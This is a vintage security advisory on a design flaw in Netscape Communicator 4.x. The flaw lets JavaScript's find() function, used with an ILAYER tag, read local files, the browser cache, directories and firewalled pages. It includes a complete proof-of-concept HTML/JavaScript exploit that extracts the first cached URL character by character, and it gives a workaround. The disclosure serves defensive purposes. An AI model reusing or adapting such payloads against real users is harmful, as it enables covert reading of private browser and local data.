COMMAND

    Netscape's find()

SYSTEMS AFFECTED

    Win systems with Netscape 4.x

PROBLEM

    Georgi  Guninski  found  following.   There  is  a  design flaw in
    Netscape Communicator  4.5   Win95, 4.08  WinNT (guess  is all 4.x
    version  are  vulnerable)  which  allows  the  following  security
    exploits:
        *) Reading the parsed content of local HTML files (by 'parsed'
           we mean the text the user sees, not the actual HTML source)
        *) Reading the  parsed content of  HTML files on  a web server
           blocked by a firewall (the browser and the web server  must
           be on the same side of the firewall)
        *) Reading user's cache
        *) Browsing directories
        *) Probably others

    The exploits  use the  JavaScript find()  function and  the ILAYER
    tag.  This may be exploited using HTML message.  Demonstration  is
    available at:

        http://www.nat.bg/~joro/nsfind.html

    Exploit follows:

    MBEGIN
    <ILAYER SRC="wysiwyg://1/about:cache">
    </ILAYER>

    <SCRIPT>
    //mag='MBEGIN';
    mag='Average cache';
    mend='MEND';
    res=mag;
    charstoread=100;

    function readit() {
    for(i=0;i<charstoread;i++) {
     t=res;
     find(mend);
     for(c=1;c<256;c++) {
       t=res + String.fromCharCode(c);

         if (find(t,true,true)) {
    //      alert(c);
          res=t;
         }
     }
    }
    res=res.substring(mag.length);
    alert("The first URL in your cache is: \n" + res);
    }
    setTimeout('readit();',3000);
    </SCRIPT>


    MEND

SOLUTION

    Workaround:  Disable  JavaScript.   After  Netscape released 4.51,
    this seems still to work.